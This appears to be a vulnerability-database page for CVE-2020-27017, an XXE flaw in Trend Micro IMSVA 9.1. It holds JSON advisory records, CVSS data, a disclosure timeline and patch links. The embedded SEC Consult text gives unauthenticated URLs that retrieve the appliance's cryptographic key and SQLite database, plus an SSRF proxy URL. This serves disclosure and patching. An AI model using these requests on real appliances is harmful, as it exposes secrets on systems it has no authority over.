unauthenticated retrieval of a cryptographic\nkey:\n\nhttps://\u003chost\u003e:8445/widget/repository/inc/class/common/crypt/crypt.key\n\nMoreover, an SQLite database can be retrieved. \nhttps://\u003chost\u003e:8445/widget/repository/db/sqlite/tmwf.db\n\nThe contents of these files have not been further investigated. \n\n\n6) Insufficient Password Storage (CVE-2020-27693)\nThe passwords for local administrators are stored in a Postgres database\n(table tb_administrator, column md5_digest). The hashes are stored as unsalted\nMD5 digests which can be cracked easily. \n\n\n7) Outdated Software (CVE-2020-27694)\nThe following software versions are present in an appliance with patch level\n1993:\n* PHP 5.6.38 (PHP 5.6 is EOL)\n* Apache HTTPD 2.4.37 (see http://httpd.apache.org/security/vulnerabilities_24.html)\n* Apache Tomcat 9.0.13 (see http://tomcat.apache.org/security-9.html)\n\nThe appliance is built on top of a CentOS base system. The CentOS packages\nappear not to be updated with appliance updates. In a test system, the command\n\"yum check-update\" yielded 203 updates to installed packages. \n\n\nVulnerable / tested versions:\n-----------------------------\nVersion 9.1.0.1960 Critical Patch 1993 has been tested and was found to be\nvulnerable. Previous versions are affected as well. \n\n\nVendor contact timeline:\n------------------------\n2020-04-28: Contacting vendor through security@trendmicro.com\n            Submitting advisory information encrypted (PGP). \n2020-04-28: Vendor reply, they will take a look at the issue. \n2020-05-06: Vendor states that vulnerability resolution is in progress;\n            Vendor has questions regarding two vulnerabilities\n2020-05-07: Clarifying vulnerabilities\n2020-05-25: Asking for status update\n2020-05-25: Vendor: Vulnerability resolution is still in progress,\n            details follow\n2020-05-27: Vendor: A fix for 4 vulnerabilities is expected for the end of June\n2020-06-29: Asking for status update\n2020-07-01: Vendor provides prerelease update that addresses #1, #2, #4, #5, #6\n2020-07-07: Sending results of short recheck\n                #1 CSRF - fixed\n                #2 XXE - fixed\n                #4 SSRF/LFD - fixed\n                #5 InfoDisc - fixed\n                #6 Password Storage - not properly fixed yet\n2020-07-08: Vendor confirms receipt; has question regarding #3\n2020-07-10: Clarifying questions\n2020-08-04: Asking for a status update\n2020-08-04: Vendor: Issue #3 is under investigation, issue #7 in progress. \n2020-08-22: Vendor provides information that all issues have been fixed except\n            issue #3 as hardening it further would potentially break some features. \n2020-08-24: Further advisory release coordination (date, CVE numbers, patch version)\n2020-09-18: Asking for a status update; Answer: \"The hotfix is ready, however, the\n            official critical patch to be used for public disclosure is still being\n            finalized\"; disclosure date will be communicated later\n2020-10-23: Patch is already public since 2020-10-09, but no security bulletin yet\n            which will be coordinated\n2020-11-04: Coordinated release of security advisory\n\n\nSolution:\n---------\nThe vendor provides a patch (9.1 Patch 3 - Critical Patch - Build 2025)\nwhich should be installed immediately. The release notes can be found here:\nhttps://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_EN_Readme.txt\n\nPatch download:\nhttps://downloadcenter.trendmicro.com/index.php?regs=nabu\u0026prodid=91\nhttps://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz\n\nTrend Micro Security Bulletin:\nhttps://success.trendmicro.com/solution/000279833\n\n\nWorkaround:\n-----------\nNo workaround available. \n\n\nAdvisory URL:\n-------------\nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSEC Consult Vulnerability Lab\n\nSEC Consult\nEurope | Asia | North America\n\nAbout SEC Consult Vulnerability Lab\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It\nensures the continued knowledge gain of SEC Consult in the field of network\nand application security to stay ahead of the attacker. The SEC Consult\nVulnerability Lab supports high-quality penetration testing and the evaluation\nof new offensive and defensive technologies for our customers. Hence our\ncustomers obtain the most current information about vulnerabilities and valid\nrecommendation about the risk profile of new technologies. \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nInterested to work with the experts of SEC Consult?\nSend us your application https://www.sec-consult.com/en/career/index.html\n\nInterested in improving your cyber security with the experts of SEC Consult?\nContact our local offices https://www.sec-consult.com/en/contact/index.html\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult\n\nEOF W. Ettlinger / @2020\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-27017"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013157"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-08545"
      },
      {
        "db": "PACKETSTORM",
        "id": "159914"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-27017",
        "trust": 3.1
      },
      {
        "db": "JVN",
        "id": "JVNVU98890246",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013157",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "159914",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-08545",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-333",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-08545"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013157"
      },
      {
        "db": "PACKETSTORM",
        "id": "159914"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-333"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-27017"
      }
    ]
  },
  "id": "VAR-202011-0744",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-08545"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-08545"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:35:08.087000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "000279833",
        "trust": 0.8,
        "url": "https://success.trendmicro.com/solution/000279833"
      },
      {
        "title": "Patch for Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) XXE vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/246676"
      },
      {
        "title": "Trend Micro InterScan Messaging Virtual Appliance Fixes for code issue vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=134508"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-08545"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013157"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-333"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-611",
        "trust": 1.0
      },
      {
        "problemtype": "DTD Improper restriction of recursive entity references in (CWE-776) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013157"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-27017"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27017"
      },
      {
        "trust": 1.7,
        "url": "https://success.trendmicro.com/solution/000279833"
      },
      {
        "trust": 1.6,
        "url": "https://sec-consult.com/en/blog/advisories/vulnerabilities-in-trend-micro-interscan-messaging-security-virtual-appliance-imsva/"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu98890246/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/trend-micro-interscan-messaging-security-virtual-appliance-multiple-vulnerabilities-33810"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/159914/trend-micro-imsva-csrf-xml-injection-ssrf-file-disclosure.html"
      },
      {
        "trust": 0.1,
        "url": "https://\u003chost\u003e:8445/widget/proxy_controller.php?module=modsimple\u0026usergenerated=1\u0026serverid=1\u0026url=http://test"
      },
      {
        "trust": 0.1,
        "url": "https://[...]:8445/ws_policies.imss\""
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27019"
      },
      {
        "trust": 0.1,
        "url": "http://tomcat.apache.org/security-9.html)"
      },
      {
        "trust": 0.1,
        "url": "https://\u003chost\u003e:8445/widget/repository/inc/class/common/crypt/crypt.key"
      },
      {
        "trust": 0.1,
        "url": "https://www.sec-consult.com/en/career/index.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.sec-consult.com"
      },
      {
        "trust": 0.1,
        "url": "https://downloadcenter.trendmicro.com/index.php?regs=nabu\u0026prodid=91"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27018"
      },
      {
        "trust": 0.1,
        "url": "https://twitter.com/sec_consult"
      },
      {
        "trust": 0.1,
        "url": "http://httpd.apache.org/security/vulnerabilities_24.html)"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27016"
      },
      {
        "trust": 0.1,
        "url": "http://blog.sec-consult.com"
      },
      {
        "trust": 0.1,
        "url": "https://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_en_readme.txt"
      },
      {
        "trust": 0.1,
        "url": "https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html"
      },
      {
        "trust": 0.1,
        "url": "https://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27693"
      },
      {
        "trust": 0.1,
        "url": "https://www.sec-consult.com/en/contact/index.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27694"
      },
      {
        "trust": 0.1,
        "url": "https://\u003chost\u003e:8445/widget/repository/db/sqlite/tmwf.db"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-08545"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013157"
      },
      {
        "db": "PACKETSTORM",
        "id": "159914"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-333"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-27017"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-08545"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013157"
      },
      {
        "db": "PACKETSTORM",
        "id": "159914"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-333"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-27017"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-02-02T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-08545"
      },
      {
        "date": "2021-06-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-013157"
      },
      {
        "date": "2020-11-05T17:02:03",
        "db": "PACKETSTORM",
        "id": "159914"
      },
      {
        "date": "2020-11-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202011-333"
      },
      {
        "date": "2020-11-09T23:15:12.147000",
        "db": "NVD",
        "id": "CVE-2020-27017"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-02-03T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-08545"
      },
      {
        "date": "2021-06-21T06:51:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-013157"
      },
      {
        "date": "2020-11-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202011-333"
      },
      {
        "date": "2024-11-21T05:20:41.063000",
        "db": "NVD",
        "id": "CVE-2020-27017"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-333"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Trend\u00a0Micro\u00a0InterScan\u00a0Messaging\u00a0Security\u00a0Virtual\u00a0Appliance\u00a0 In \u00a0DTD\u00a0 Vulnerability in improper restriction of recursive entity references in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-013157"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "code problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202011-333"
      }
    ],
    "trust": 0.6
  }
}

GHSA-M5FQ-FJ2F-7888

Vulnerability from github – Published: 2022-05-24 17:34 – Updated: 2022-05-24 17:34

Details

Show details on source website

JSON

To clipboard

{
  "affected": [],
  "aliases": [
    "CVE-2020-27017"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-11-09T23:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability.",
  "id": "GHSA-m5fq-fj2f-7888",
  "modified": "2022-05-24T17:34:01Z",
  "published": "2022-05-24T17:34:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27017"
    },
    {
      "type": "WEB",
      "url": "https://sec-consult.com/en/blog/advisories/vulnerabilities-in-trend-micro-interscan-messaging-security-virtual-appliance-imsva"
    },
    {
      "type": "WEB",
      "url": "https://success.trendmicro.com/solution/000279833"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

CNVD-2021-08545

Vulnerability from cnvd - Published: 2021-02-02

Title

Trend Micro InterScan Messaging Security Virtual Appliance（IMSVA）XXE漏洞

Description

Trend Micro InterScan Messaging Security Virtual Appliance（IMSVA）是美国趋势科技（Trend Micro）公司的一款用于保障通讯安全的设备。 Trend Micro InterScan Messaging Security Virtual Appliance（IMSVA）存在XXE漏洞。攻击者可利用漏洞读取任意本地文件。

Severity

中

Patch Name

Trend Micro InterScan Messaging Security Virtual Appliance（IMSVA）XXE漏洞的补丁

Patch Description

Formal description

目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://success.trendmicro.com/solution/000279833

Reference

https://nvd.nist.gov/vuln/detail/CVE-2020-27017

Impacted products

Name
Trend Micro InterScan Messaging Security Virtual Appliance（IMSVA） 9.1

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2020-27017",
      "cveUrl": "https://nvd.nist.gov/vuln/detail/CVE-2020-27017"
    }
  },
  "description": "Trend Micro InterScan Messaging Security Virtual Appliance\uff08IMSVA\uff09\u662f\u7f8e\u56fd\u8d8b\u52bf\u79d1\u6280\uff08Trend Micro\uff09\u516c\u53f8\u7684\u4e00\u6b3e\u7528\u4e8e\u4fdd\u969c\u901a\u8baf\u5b89\u5168\u7684\u8bbe\u5907\u3002\n\nTrend Micro InterScan Messaging Security Virtual Appliance\uff08IMSVA\uff09\u5b58\u5728XXE\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u6f0f\u6d1e\u8bfb\u53d6\u4efb\u610f\u672c\u5730\u6587\u4ef6\u3002",
  "formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u53d1\u5e03\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8865\u4e01\u83b7\u53d6\u94fe\u63a5\uff1a\r\nhttps://success.trendmicro.com/solution/000279833",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2021-08545",
  "openTime": "2021-02-02",
  "patchDescription": "Trend Micro InterScan Messaging Security Virtual Appliance\uff08IMSVA\uff09\u662f\u7f8e\u56fd\u8d8b\u52bf\u79d1\u6280\uff08Trend Micro\uff09\u516c\u53f8\u7684\u4e00\u6b3e\u7528\u4e8e\u4fdd\u969c\u901a\u8baf\u5b89\u5168\u7684\u8bbe\u5907\u3002\r\n\r\nTrend Micro InterScan Messaging Security Virtual Appliance\uff08IMSVA\uff09\u5b58\u5728XXE\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u6f0f\u6d1e\u8bfb\u53d6\u4efb\u610f\u672c\u5730\u6587\u4ef6\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Trend Micro InterScan Messaging Security Virtual Appliance\uff08IMSVA\uff09XXE\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": "Trend Micro InterScan Messaging Security Virtual Appliance\uff08IMSVA\uff09 9.1"
  },
  "referenceLink": "https://nvd.nist.gov/vuln/detail/CVE-2020-27017",
  "serverity": "\u4e2d",
  "submitTime": "2020-11-06",
  "title": "Trend Micro InterScan Messaging Security Virtual Appliance\uff08IMSVA\uff09XXE\u6f0f\u6d1e"
}

GSD-2020-27017

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2020-27017

Aliases

CVE-2020-27017

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2020-27017",
    "description": "Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability.",
    "id": "GSD-2020-27017",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2020-27017"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2020-27017"
      ],
      "details": "Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability.",
      "id": "GSD-2020-27017",
      "modified": "2023-12-13T01:22:10.808381Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security@trendmicro.com",
        "ID": "CVE-2020-27017",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA)",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "9.1"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "Trend Micro"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "XXE"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://success.trendmicro.com/solution/000279833",
            "refsource": "MISC",
            "url": "https://success.trendmicro.com/solution/000279833"
          },
          {
            "name": "https://sec-consult.com/en/blog/advisories/vulnerabilities-in-trend-micro-interscan-messaging-security-virtual-appliance-imsva/",
            "refsource": "MISC",
            "url": "https://sec-consult.com/en/blog/advisories/vulnerabilities-in-trend-micro-interscan-messaging-security-virtual-appliance-imsva/"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:trendmicro:interscan_messaging_security_virtual_appliance:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "9.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security@trendmicro.com",
          "ID": "CVE-2020-27017"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-611"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "N/A",
              "refsource": "N/A",
              "tags": [
                "Exploit",
                "Vendor Advisory"
              ],
              "url": "https://success.trendmicro.com/solution/000279833"
            },
            {
              "name": "N/A",
              "refsource": "N/A",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://sec-consult.com/en/blog/advisories/vulnerabilities-in-trend-micro-interscan-messaging-security-virtual-appliance-imsva/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "availabilityImpact": "NONE",
            "baseScore": 4.0,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 8.0,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      },
      "lastModifiedDate": "2021-07-21T11:39Z",
      "publishedDate": "2020-11-09T23:15Z"
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2020-27017 (GCVE-0-2020-27017)

FKIE_CVE-2020-27017

VAR-202011-0744

Vendor description:

Business recommendation:

Vulnerability overview/description:

Proof of concept:

Vulnerable / tested versions:

Vendor contact timeline:

Solution:

Workaround:

Advisory URL:

GHSA-M5FQ-FJ2F-7888

CNVD-2021-08545

GSD-2020-27017

Tags

Sightings

Nomenclature